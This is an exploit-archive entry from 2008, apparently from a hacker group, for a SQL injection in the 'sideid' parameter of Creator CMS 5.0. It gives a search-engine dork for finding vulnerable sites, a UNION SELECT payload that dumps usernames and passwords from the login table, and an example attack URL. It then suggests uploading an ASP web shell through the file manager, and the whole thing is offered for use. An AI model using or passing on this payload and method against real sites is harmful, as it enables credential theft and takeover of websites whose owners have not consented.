[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Creator CMS 5.0 (sideid) Remote SQL Injection Vulnerability
# Published : 2008-09-09
# Author : ThE X-HaCkEr
# Previous Title : Live TV Script (index.php mid) SQL Injection Vulnerability
# Next Title : Stash 1.0.3 Insecure Cookie Handling Vulnerability


# Exploit : Creator CMS 5.0 Remote SQL Injection Vulnerability
#
# Vendor : www.cmind.dk
#
# Founded By : ThE X-HaCkEr From X9 Team ( ThE X-HaCkEr & dr.9)
#     
# Greetz To : tryag.cc & saudihack.com & hackteach.org all muslim
#
# Email : the-x-hacker[@]hotmail[.]fr
#
# Google D0rk : allinurl:index.asp?sideid=

POC : www.site.com/index.asp?sideid=[SQL]

SQL : 1+union+select+concat(username,0x3a,password),2,3+from+login/*

Example : http://www.xxx.dk/index.asp?sideid=28+union+select+concat(username,0x3a,password),2,3+from+login/*

You can upload an asp shell through file manager

Enjoy !!!

# www.Syue.com [2008-09-09]